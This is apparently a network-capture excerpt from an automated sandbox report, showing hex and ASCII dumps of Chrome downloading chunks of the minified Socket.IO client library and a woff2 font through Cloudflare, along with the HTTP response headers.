                                                                                                                                                                                                                                                                                                              Data Ascii: /*! * Socket.IO v4.6.0 * (c) 2014-2023 Guillermo Rauch * Released under the MIT License. */!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof g
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC666INData Raw: 6c 65 3d 21 31 3b 66 6f 72 28 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 72 3d 74 5b 6e 5d 2c 69 3d 6e 3d 3d 3d 74 2e 6c 65 6e 67 74 68 2d 31 3b 45 28 72 2c 65 2e 73 75 70 70 6f 72 74 73 42 69 6e 61 72 79 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 72 79 7b 65 2e 77 73 2e 73 65 6e 64 28 74 29 7d 63 61 74 63 68 28 74 29 7b 7d 69 26 26 69 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 77 72 69 74 61 62 6c 65 3d 21 30 2c 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 64 72 61 69 6e 22 29 7d 29 2c 65 2e 73 65 74 54 69 6d 65 6f 75 74 46 6e 29 7d 29 29 7d 2c 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 6e 28 72 29 7d 7d 2c 7b 6b 65 79 3a 22 64 6f 43 6c 6f 73 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 6f
                                                                                                                                                                                                                                                                                                              Data Ascii: le=!1;for(var n=function(n){var r=t[n],i=n===t.length-1;E(r,e.supportsBinary,(function(t){try{e.ws.send(t)}catch(t){}i&&it((function(){e.writable=!0,e.emitReserved("drain")}),e.setTimeoutFn)}))},r=0;r<t.length;r++)n(r)}},{key:"doClose",value:function(){vo
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC682INData Raw: 73 68 69 66 74 28 74 29 2c 74 68 69 73 2e 5f 6f 70 74 73 2e 72 65 74 72 69 65 73 26 26 21 74 68 69 73 2e 66 6c 61 67 73 2e 66 72 6f 6d 51 75 65 75 65 26 26 21 74 68 69 73 2e 66 6c 61 67 73 2e 76 6f 6c 61 74 69 6c 65 29 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 61 64 64 54 6f 51 75 65 75 65 28 6e 29 2c 74 68 69 73 3b 76 61 72 20 69 3d 7b 74 79 70 65 3a 45 74 2e 45 56 45 4e 54 2c 64 61 74 61 3a 6e 2c 6f 70 74 69 6f 6e 73 3a 7b 7d 7d 3b 69 66 28 69 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6d 70 72 65 73 73 3d 21 31 21 3d 3d 74 68 69 73 2e 66 6c 61 67 73 2e 63 6f 6d 70 72 65 73 73 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 5b 6e 2e 6c 65 6e 67 74 68 2d 31 5d 29 7b 76 61 72 20 6f 3d 74 68 69 73 2e 69 64 73 2b 2b 2c 73 3d 6e 2e 70 6f 70 28 29 3b 74 68
                                                                                                                                                                                                                                                                                                              Data Ascii: shift(t),this._opts.retries&&!this.flags.fromQueue&&!this.flags.volatile)return this._addToQueue(n),this;var i={type:Et.EVENT,data:n,options:{}};if(i.options.compress=!1!==this.flags.compress,"function"==typeof n[n.length-1]){var o=this.ids++,s=n.pop();th
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC693INData Raw: 65 2c 65 3d 76 6f 69 64 20 30 29 3b 76 61 72 20 72 2c 69 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 22 22 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 3f 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3a 76 6f 69 64 20 30 2c 72 3d 74 3b 6e 3d 6e 7c 7c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6c 6f 63 61 74 69 6f 6e 26 26 6c 6f 63 61 74 69 6f 6e 2c 6e 75 6c 6c 3d 3d 74 26 26 28 74 3d 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 22 2b 6e 2e 68 6f 73 74 29 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 22 2f 22 3d 3d 3d 74 2e 63 68 61 72 41
                                                                                                                                                                                                                                                                                                              Data Ascii: e,e=void 0);var r,i=function(t){var e=arguments.length>1&&void 0!==arguments[1]?arguments[1]:"",n=arguments.length>2?arguments[2]:void 0,r=t;n=n||"undefined"!=typeof location&&location,null==t&&(t=n.protocol+"//"+n.host),"string"==typeof t&&("/"===t.charA


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              58104.21.0.95443192.168.2.1649793C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC638INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:39 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: font/woff2
                                                                                                                                                                                                                                                                                                              Content-Length: 28000
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 25 Aug 2023 04:00:16 GMT
                                                                                                                                                                                                                                                                                                              ETag: "6d60-603b761e42cdb"
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                                              Age: 10786
                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Uk84Ho77Uv%2Bz7czdgsF7spIeZyKnM4696Zh5sFLps9iWl8K9%2Bnyo3eMEDshM%2B%2B71S47RvlWZQl7G1asmow%2BTXOMAIxqkPh4GR%2FOj%2Bshue2luyQWGUQoR9kOzReic%2B9giAHSJLTWh4Fprc%2FU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd4038b1d8206-IAD
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC638INData Raw: 77 4f 46 32 00 01 00 00 00 00 6d 60 00 10 00 00 00 01 24 08 00 00 6c fd 00 01 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 81 9d 36 1c 89 16 06 60 00 8e 3c 08 3c 09 97 62 11 08 0a 82 bb 24 82 9c 7f 01 36 02 24 03 8e 78 0b 87 3e 00 04 20 05 8c 03 07 97 7b 0c 81 0d 5b 09 10 71 05 6b b7 5d 5d 4f 88 db 06 10 73 b3 fd a9 7c 99 02 6e 8c 9b c7 21 18 d6 5b 3c 3b 10 83 ee e0 50 26 a6 cf 67 ff ff ff bf 21 a9 c8 98 49 27 69 b7 0d 51 01 44 50 d5 df 9f c4 1e 39 02 92 4a a0 06 b7 80 17 c1 39 47 eb 95 e9 98 51 31 28 8b f2 29 4a 6e c6 19 d5 d4 c5 d4 38 59 f3 d2 1b f9 1a 98 29 4a ce 46 0e 63 20 41 96 af 37 6b ab 76 b3 8b e9 32 3d a1 5a ee 6e fa 34 60 12 ed 81 a0 c0 7e 4e 6c a4 81 ef 34 3b aa 91 07 53 f6 6c 7b 77 c7 c7 3a ae 23 d5 ee aa 3d 21 bc 20
                                                                                                                                                                                                                                                                                                              Data Ascii: wOF2m`$lB6`<<b$6$x> {[qk]]Os|n![<;P&g!I'iQDP9J9GQ1()Jn8Y)JFc A7kv2=Zn4`~Nl4;Sl{w:#=!
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC639INData Raw: 60 6e 0e 03 d1 c6 d1 b1 01 23 96 c5 c6 c6 36 d8 1a 18 b1 8d 31 60 6b 62 64 8c 14 5a 05 01 29 e3 8a 78 01 15 fa 46 e3 03 eb fe fa b7 95 f8 54 84 e7 5f 9d ef 7d 12 9b 95 70 fd 81 9d 5f 46 17 30 a7 53 27 15 56 da 67 e4 e1 d1 bf 9e ff b5 93 ec 93 33 f3 24 f4 ae 88 4a 66 f9 6a 08 5f 2c 4a a1 16 ee 84 c0 76 37 28 ce 87 d9 f6 28 b3 b2 62 6d af 88 c8 ce de 61 1e a1 89 85 4e 68 d6 28 51 53 d7 92 48 1f 00 7f 35 d7 77 b9 6f ed 31 e5 5b 3c 6d ed 31 a6 63 4a d1 1f b3 13 b2 13 42 f2 bb 8e ab 8c a2 83 d8 52 0c 83 4c 8b 0d 3e 5b 7c 40 ff ff 5d d3 83 f4 2f 97 fd a3 36 85 5c b6 0c 28 af 6a c8 42 6e 0e d0 cf 4f 6a 16 26 2f 6a 40 11 27 54 db a1 8e 03 77 13 2c 9b ad 9f 2a be fa 92 65 8f 67 c7 b8 49 3d ef b3 77 d0 78 d0 0e 61 70 ba fc 3f fd 8d ce 05 0b a1 0f 6c 49 e0 8d 2f d1
                                                                                                                                                                                                                                                                                                              Data Ascii: `n#61`kbdZ)xFT_}p_F0S'Vg3$Jfj_,Jv7((bmaNh(QSH5wo1[<m1cJBRL>[|@]/6\(jBnOj&/j@'Tw,*egI=wxap?lI/
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC640INData Raw: b8 09 b2 d6 61 05 83 56 c2 bc b1 90 44 0e c5 08 6b 2c 91 ea dc d6 bb e5 7b c6 4f c5 ff d5 85 d4 c1 52 07 ca a0 02 aa a0 01 9a d3 5d 78 fe f2 9b 77 4a 1a 27 28 12 63 f2 b1 d8 e0 82 72 c9 ab 98 cb ed 22 51 57 b1 7a e3 92 08 99 1d 19 a6 3a 1f f4 30 ba 74 26 a5 50 a1 88 24 1d 80 12 d3 d3 1a 86 98 92 6a 61 d9 78 8e fc d2 bb 91 01 2c 0c 46 85 61 13 af c3 71 7c 92 7e 54 c1 00 21 65 96 58 75 2e 6e 07 51 07 31 2c 03 c0 00 00 03 f4 3b b2 0c 42 a9 57 d0 e4 41 9a bd 3c b9 93 de ad 3c ac 30 6a ed 4d 32 c0 00 9b 88 08 f5 ce f8 b9 ba f5 56 ea f0 6c d2 85 b7 bb 25 c2 22 9c 44 d9 c5 d0 12 b1 70 be 5a 41 16 48 db 9a 06 31 c8 ea 19 a9 3a 06 d4 aa 89 ad 9c 38 a7 c3 75 05 05 29 61 e9 ea 01 b0 66 02 87 c6 5d e0 c2 39 86 8e b5 2c 7b 06 32 90 0c 4c 11 9d 63 59 fe 64 e7 29 46 cc
                                                                                                                                                                                                                                                                                                              Data Ascii: aVDk,{OR]xwJ'(cr"QWz:0t&P$jax,Faq|~T!eXu.nQ1,;BWA<<0jM2Vl%"DpZAH1:8u)af]9,{2LcYd)F
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC642INData Raw: e7 2b 63 66 08 c7 02 c4 37 95 09 81 4e 27 7b dd 4d 31 ea be 9b 63 e0 4e dd b4 72 4e ab 92 fc 99 eb 56 d9 e2 40 12 0c 91 08 4c 3e fa 7e 9c af 07 c1 b5 da 13 ac 91 e0 d8 76 0b d2 26 d1 ad da 96 07 b7 ff 29 78 10 de 49 0a 2c 27 b3 c9 25 0a 3a 26 37 a5 42 24 df 47 6a 01 8b e2 5c d3 77 36 9a b1 f4 e5 54 21 ef 80 1c cf 6e 08 12 76 99 3d 32 cf 05 d1 e1 3a 89 e2 5f 9e 52 dd 5c 6a 28 64 11 c4 ee 24 64 48 c8 fd 6d 7f db d7 ba 53 64 f4 de 53 a5 39 f6 81 b5 4a ab 39 ad bd 59 53 ee fe d9 55 04 fd d1 af d7 5d 5a b7 27 98 73 82 85 61 4b 86 63 8b b5 1e 52 ff f3 fe ff f9 47 bc d2 ed 87 ef a6 44 97 1a 59 a7 e4 bd 9f d1 bf ff f5 c8 d2 57 0b ed 38 0c f8 a4 94 94 3e b9 c9 ce b0 dd fc e4 f4 77 1f b0 b0 d0 62 3c 54 d4 68 72 35 be a6 b6 33 e0 f0 cc d4 80 f2 49 69 54 a2 d3 75 18
                                                                                                                                                                                                                                                                                                              Data Ascii: +cf7N'{M1cNrNV@L>~v&)xI,'%:&7B$Gj\w6T!nv=2:_R\j(d$dHmSdS9J9YSU]Z'saKcRGDYW8>wb<Thr53IiTu
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC643INData Raw: e2 fb 9b a7 1a a3 28 98 5c 14 26 db c4 f1 5a 8c 40 9b b9 94 2f 3d 29 8b ec 2f f5 80 6e 96 fc af e6 21 af cd ce e9 46 a9 7d 49 30 8f c0 3a ad aa d4 e8 89 4b 08 b7 db ab 19 c1 45 a1 a6 9d 3d f1 73 76 df 9e 41 bd ee 51 7f 92 be e6 cb 48 ad 45 03 c0 cc 42 97 75 c8 c6 b8 b9 82 7f a6 fe a5 fc cc 60 79 f8 a3 69 ef 78 37 53 0f 7b 2f e6 c6 42 87 18 fb 76 82 cd 66 f6 71 0b 39 15 7a 05 bc 15 8d 32 3c 03 77 76 fa 36 3f 60 c7 ab bb a4 5c 1f d7 79 a2 df e6 e1 ec 4f f9 8c 1c f9 57 a8 7c 56 76 c0 1f 9e 2c 13 99 13 55 01 ab be eb 5d 13 72 ed 4d 3b 2c da 5e cf 76 88 d9 a1 fe ec d5 1e c7 5d 0f f2 02 6b 19 fa 68 8b b4 29 22 bf 37 01 c6 33 e9 d9 4b e0 eb 40 3b 1d 57 d8 19 0a 69 f2 60 45 f0 80 4c 18 28 7b 07 b4 67 e8 7d 43 11 ec 12 48 9e e9 51 aa d3 1a e8 6e 7c 6c bd a4 5f 0d
                                                                                                                                                                                                                                                                                                              Data Ascii: (\&Z@/=)/n!F}I0:KE=svAQHEBu`yix7S{/Bvfq9z2<wv6?`\yOW|Vv,U]rM;,^v]kh)"73K@;Wi`EL({g}CHQn|l_
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC644INData Raw: 1d 5e d6 db 5d 77 71 bb cf 4a 7b 30 1e c5 43 1f e1 7d f2 0d c1 66 27 e5 c9 db 87 00 bb b4 8a 46 e1 c6 40 ba 35 a4 9b 26 94 36 b1 ce 29 b7 13 1c 3b 62 83 77 bb da 22 df dd 81 74 c7 4e 28 5d ba 4d a3 7b 10 c5 e0 fc 18 6f ec 3d 04 25 64 04 81 38 38 9c 4c 44 aa 5d 23 47 b1 cd c8 b6 3b 27 97 47 5e c0 6f c6 71 3e 11 0b 70 5f c8 8e b8 3d 24 8b 09 c6 3b 97 72 5c 06 5b e3 1e 9c 56 04 79 1f 41 56 21 da 6a d9 af 91 db 5a b9 b7 48 75 9d d4 d6 4f 71 c5 e3 9a a7 7c 0a 39 6e 91 f6 d6 45 d6 db b4 c7 17 cf 87 0c 76 ca 70 97 6c 76 cb f6 5e 59 de 27 ab 3d f2 da 2b cd 07 a4 b5 4f ba fb a5 77 40 ea 0f 4a e5 e0 22 8d 43 86 93 3b 12 72 38 5a 99 ed 8e 7b e6 2d e7 3e 91 dd 49 2a 8b 3d b2 92 dc 17 5b 5c e7 e2 94 3f 1a 32 7d f5 4a 5f f5 b5 4c 2e 23 e3 b7 7f c7 05 01 96 e2 96 7d c5
                                                                                                                                                                                                                                                                                                              Data Ascii: ^]wqJ{0C}f'F@5&6);bw"tN(]M{o=%d88LD]#G;'G^oq>p_=$;r\[VyAV!jZHuOq|9nEvplv^Y'=+Ow@J"C;r8Z{->I*=[\?2}J_L.#}
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC646INData Raw: e8 20 b2 1d 95 ee 0b e9 e8 2e 62 3b 89 e9 da 99 9a 4b 4e f6 73 ac b7 c3 fd 49 9b 73 6e 90 0b 43 9c 1f 2c 2e 44 fc 50 49 23 24 0c 93 1a 2e 39 94 86 ab 72 e2 e5 c5 c9 8e 91 9f 20 23 91 82 65 65 e9 fa 46 eb 57 9b 63 38 d7 d0 58 23 9a f2 84 d3 71 9f 2e 3d 0f 18 7b 6a cf 1d 8e f6 92 15 ad 30 45 57 aa 8e 24 c5 c9 42 69 b9 41 df 43 76 5e 39 1b 2c 71 b8 94 b0 71 13 27 54 8c 2f 64 e8 a8 64 a4 7d 69 7a 46 19 1c 83 e8 3d 5b 2f 59 78 c7 ca 6b d6 9e b2 f1 cc 0e ff f1 0b 80 d3 7c 66 58 73 7a a0 53 03 9c 09 52 91 61 20 7b c1 c2 25 8b 16 2f 7d 1b dc c4 16 f7 b1 0a 71 72 1e 77 48 ac 1b eb c5 46 45 a5 53 58 c7 bf c1 c2 77 cf 6f 87 ab d4 21 cc 7f 20 9c 35 6d c6 ac 39 f3 16 2c 5a f2 15 0d 3a 5d 3f 18 a8 33 23 87 b4 68 d5 e6 a2 76 1d 3a 75 e9 b1 65 e8 a1 d0 a0 21 c3 46 8c 1a
                                                                                                                                                                                                                                                                                                              Data Ascii: .b;KNsIsnC,.DPI#$.9r #eeFWc8X#q.={j0EW$BiACv^9,qq'T/dd}izF=[/Yxk|fXszSRa {%/}qrwHFESXwo! 5m9,Z:]?3#hv:ue!F
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC647INData Raw: 92 c8 10 e9 ad 88 1a eb f2 72 14 e7 b9 94 56 79 05 a1 40 f2 ea 9d 11 72 0f f9 22 d5 49 de b4 7f 22 1f 9b c6 4c 1d c3 1e 69 b9 93 d5 97 ae 95 c3 b8 e5 4c b2 e6 db ca 21 55 4c 5f 7c ed 32 e8 36 44 8d 02 7a 3d 76 8a 24 05 12 9a c6 1b 05 9e 1d e5 76 54 e5 12 19 8b 24 ab b5 a9 57 67 f7 61 dd be a7 68 da 26 95 e4 f0 b8 58 29 1e c2 1d b9 16 a5 37 fb a1 17 75 20 16 f2 a4 19 25 c4 a1 db e6 81 68 07 61 08 ae fe 82 85 db a5 99 be 09 26 78 af 9c ea 68 96 b3 bc 95 ba 42 03 39 4f d1 ba 84 d7 a0 73 62 36 a9 70 2f 4c 9d 96 23 01 82 ef db 42 16 15 36 5b 3d 68 76 30 01 b4 3f ae 1a bb 41 d8 33 9d 69 1f 82 83 04 e8 3a 24 08 47 26 74 0c c1 49 02 14 9d 12 84 33 13 3a 87 e0 22 81 48 5d 12 84 2b 13 ba 86 e0 26 81 28 dd 12 84 3b 13 ba 87 e0 21 01 aa 1e 09 c2 93 09 3d 43 ee 0f a0
                                                                                                                                                                                                                                                                                                              Data Ascii: rVy@r"I"LiL!UL_|26Dz=v$vT$Wgah&X)7u %ha&xhB9Osb6p/L#B6[=hv0?A3i:$G&tI3:"H]+&(;!=C
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC648INData Raw: 59 30 8a 5a 7d 78 6c a5 b8 4d f9 3c d6 d1 01 2d e6 7a 34 d1 d3 99 1a 0f d5 80 85 cc 46 91 bb 8c a9 09 ef 55 d8 6b db 54 a6 bb 17 32 84 0c ab 6e 0b 92 24 dc 4b 77 12 91 1e ba 6d a4 84 0e c2 e9 89 4b d9 f3 66 a6 14 32 50 1b ed d4 f4 35 49 d1 4b 0f e7 7b bf 6e ac 54 e3 4e 6d 85 a0 5b d0 c2 e8 0b b8 3b b5 44 b6 f1 45 d1 69 56 1f 33 d5 8e c0 3f 70 96 62 13 ec f0 3c 19 83 31 48 ec 8a 16 47 1f b8 4d 7d 45 cf eb a8 af a1 1d 82 f6 e0 5f 40 eb fa 57 1a 36 75 77 e3 6b 8f 95 2d 77 3c d6 97 0a b5 95 60 df e1 92 9b 8f 54 69 7e 65 8f c9 d2 8b b7 00 79 be 74 b1 93 64 ec 36 a8 6d 45 f0 2f 0a ee 01 03 97 4e 6b 3e c8 1a a3 ca b5 e2 69 65 a0 c5 2e 79 8d 81 34 28 2b 65 b7 cc 4f 20 50 d0 ec 5e cc 74 7f 91 9e 6b 38 15 78 eb de 2b c7 15 0b 16 1a b2 ee 4e ad c2 e9 8b 5b 73 fc 86
                                                                                                                                                                                                                                                                                                              Data Ascii: Y0Z}xlM<-z4FUkT2n$KwmKf2P5IK{nTNm[;DEiV3?pb<1HGM}E_@W6uwk-w<`Ti~eytd6mE/Nk>ie.y4(+eO P^tk8x+N[s
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC650INData Raw: a9 3e d6 97 ef 56 5f 47 dc fc 15 c7 4e 5d ec c5 c1 a9 61 2a 24 cf 41 e5 e9 90 4b f9 62 6e 66 8b 6c 3a 4b e7 cd 48 10 60 54 48 67 78 34 48 47 e8 90 d4 d5 e8 d0 9f 1f 13 58 e3 a1 6c 3b d7 49 7f ab 18 2a ca d4 a2 4c c4 9a 12 0a e1 82 4e 7f f4 c4 aa 6b 8f 5e ab 33 6c 63 6b 4b f3 ee a2 d3 d9 bb d5 8f c7 e8 f6 d3 7a f9 f8 28 0d 97 1c 4f 9b 9c bf e1 eb c6 fc 57 26 68 db 17 5d ad 78 ed b8 dc 6f 3d d3 ab cd 73 e8 4d de bf b9 6f d5 16 c9 f9 07 84 47 7a bd e1 d5 72 3d 9a 8c 8f 09 f5 48 b2 e2 ab 21 51 e1 7a dd 15 db c7 8c 0c 1f 7f 63 d9 8c d8 18 b6 3b 56 e0 30 21 16 07 10 af 36 fd c1 be d0 cf ab a8 4d 1d 65 5a 7e b9 80 37 1c 55 3d e6 04 55 75 82 fc 15 d9 2b 1b 2a fb 62 0b 46 1e 9f b3 8c ec 16 70 86 18 f7 c7 16 02 3a 83 cf fc 9f 05 d7 e0 cb aa 57 e9 af 6c 68 ed c4 bf
                                                                                                                                                                                                                                                                                                              Data Ascii: >V_GN]a*$AKbnfl:KH`THgx4HGXl;I*LNk^3lckKz(OW&h]xo=sMoGzr=H!Qzc;V0!6MeZ~7U=Uu+*bFp:Wlh
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC651INData Raw: f0 b2 80 b4 d7 8b ec d6 73 86 5d 72 3e b3 d2 a1 d7 ea 80 17 c5 bd 97 7d 3e 2b 74 01 46 f1 ec 8c 54 a4 d8 a2 b3 06 f8 8a 86 e0 d3 fd 09 51 38 2d 3b 6c 31 67 da 23 74 93 6c f7 1e 58 56 f6 20 99 bc 5d a4 25 06 7b 96 9f f0 83 5d ff d9 4e b8 dc 45 21 47 b7 9a 68 55 19 51 06 f0 9c 70 53 83 ad ff 7b cc 59 54 4d 26 bb 57 a9 f4 8c 6b 32 a6 11 fa a5 c5 17 55 b9 12 b1 38 4f 56 b1 a4 08 dd ee 2b fa a9 49 5f f6 d1 f4 69 fa 53 f2 bf e4 bf 60 ae 77 fb ee 05 6c 4e 93 da b1 cd 36 85 dd 6c 86 f2 f3 8d 94 69 fb 7a 78 69 43 b8 5e 1b cf 2a 60 05 50 66 2d 02 e3 77 9a fa b4 01 8c 46 8d de 9b a4 ba b6 b3 c5 98 3b 24 d0 8e 4c 1f da 13 88 48 f1 8f 22 81 44 61 ef 84 74 2a 02 c6 26 ea 9b 6d e6 18 56 67 4b 50 bc 8c e1 18 63 03 76 c9 64 f4 14 0d 0d 43 b1 aa d8 3e 74 98 6a fb 2d 25 52
                                                                                                                                                                                                                                                                                                              Data Ascii: s]r>}>+tFTQ8-;l1g#tlXV ]%{]NE!GhUQpS{YTM&Wk2U8OV+I_iS`wlN6lizxiC^*`Pf-wF;$LH"Dat*&mVgKPcvdC>tj-%R
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC652INData Raw: 37 5b 58 11 4c 09 03 c7 e7 35 f1 e0 00 bb 97 b4 74 68 a4 d0 db 44 20 f9 9a 68 42 55 38 95 a6 82 46 8a e3 5f 86 f7 36 46 de 9a 50 2c b3 26 a7 28 c7 cd bc b9 bc d9 fe 7d be d8 55 e3 69 bf 29 b1 ad b8 15 4b 03 2f 8a 3e fc 3a 8c 37 8c a8 60 b4 a3 65 b5 e5 03 42 62 fd 93 0a 97 dc f2 89 52 bb 8c 07 79 34 9f 8b b2 7a 36 36 e4 d1 00 4f 03 a0 80 88 e1 66 a6 f6 56 fe ca bd 67 53 ec fe e6 8a e5 08 81 34 2a fd 7e 85 b8 6e 21 c1 e8 b8 f1 df aa 8c a1 80 df a8 64 d3 53 c4 5a 61 a4 97 79 5c a3 c8 cd b4 9e f0 4a ea 2c f0 76 e2 fd ac 67 47 c1 6f 4a ea ef 40 82 09 68 85 1d 67 c7 6e 05 59 4c 04 42 e5 ec 2c 89 bc 20 85 4d 4c 63 f3 88 1c 98 b3 6d c6 f7 21 72 59 6e ea bb 8f 8f a3 a2 46 8a 74 c7 50 ca a4 6e 48 86 00 95 17 2d a4 66 73 c5 54 ba 3f 38 85 61 8c 4f 29 91 31 a1 79 89
                                                                                                                                                                                                                                                                                                              Data Ascii: 7[XL5thD hBU8F_6FP,&(}Ui)K/>:7`eBbRy4z66OfVgS4*~n!dSZay\J,vgGoJ@hgnYLB, MLcm!rYnFtPnH-fsT?8aO)1y
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC654INData Raw: bd bb 60 f1 ef 48 89 6e 14 e1 6e 48 b0 1d 01 ff f4 f0 a7 f2 87 e2 2a f6 d7 43 3b 9f 53 21 e9 0d f8 14 7f 9e 52 92 0f a2 d7 ed fb 15 09 fc f0 cf be 83 87 fa d4 a6 fb c6 fb 8b 83 fb b5 0c 7e 78 45 f2 f8 59 a9 2f b3 e7 38 05 67 62 ab 41 ba 1d 04 bf 3d f0 b4 64 54 4d 6c 49 d3 37 c3 b2 75 58 97 10 ae 73 02 82 81 2b 52 27 74 c0 c4 dc ba 30 85 08 65 66 a0 9d 15 f8 c4 f4 44 76 c4 9d d7 b7 34 95 84 98 e1 b6 48 5e 7e 5d 80 4f 14 06 ce a7 72 8d 71 c9 28 a1 09 8f e7 0b 98 f4 78 96 4d a7 3e 4b 26 8a 27 57 c0 a4 c2 0d 3e 47 29 09 a5 e5 a8 b7 25 37 c3 aa e7 7f 8d 0b 3b fe 75 7b c6 9a f5 74 df b5 0b b8 e2 1f 7f cc 8f 98 dc 47 ff a7 a4 fb 84 3c bd a0 a1 60 47 2e 9e dc 4d 4c 8e af c1 8b 33 82 1a 39 39 fc 87 2d c7 2f a9 b3 05 79 68 95 2d 73 19 10 b6 80 b6 0a fb 8d b4 34 40
                                                                                                                                                                                                                                                                                                              Data Ascii: `HnnH*C;S!R~xEY/8gbA=dTMlI7uXs+R't0efDv4H^~]Orq(xM>K&'W>G)%7;u{tG<`G.ML399-/yh-s4@
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC655INData Raw: de e4 af a4 70 e2 04 14 58 d4 4c d8 03 ec 4c 61 1b 32 38 29 db 04 4e f6 78 58 3a 1b 10 e4 20 f2 33 b9 bc ba e0 17 ed 1e 08 15 fb 18 9d 20 1b 0d 71 23 f0 92 34 76 67 72 b2 b9 b6 1c 81 c7 1d 03 e0 8a 8f d9 3f 2a 1e bb 1b 63 cc d7 55 c9 c3 69 20 dc d8 50 2d 1e 0f 47 aa 06 82 c3 6b 21 b1 b1 90 78 35 44 4b 95 96 d4 11 14 9b 85 44 b0 d9 a8 e0 00 10 48 36 0b e3 7c 67 9d 8f 00 d3 36 71 a7 99 7b 80 bb cb 0c 4c dc c5 f4 41 ae ed f7 94 c5 01 de de ae 02 84 ff b3 e7 98 08 1c 79 d8 5a 7d 17 f5 d9 64 42 02 2e dc bb d7 3a d8 7e af b2 f9 6b 9a 75 75 62 e4 86 fa f5 95 f2 8e 57 bc 6c 29 a3 d9 7b 5c 28 f6 19 8b 6e 30 4b 04 02 73 5c 74 e3 39 54 62 91 cf 38 ab a9 30 1e e2 70 d1 7a f7 2c 39 d3 31 3a 14 c4 08 7b 03 88 da 5f ee 9e ee 4b f7 de 7c 7e 7d 75 7f dc 17 87 9f c5 45 49
                                                                                                                                                                                                                                                                                                              Data Ascii: pXLLa28)NxX: 3 q#4vgr?*cUi P-Gk!x5DKDH6|g6q{LAyZ}dB.:~kuubWl){\(n0Ks\t9Tb80pz,91:{_K|~}uEI
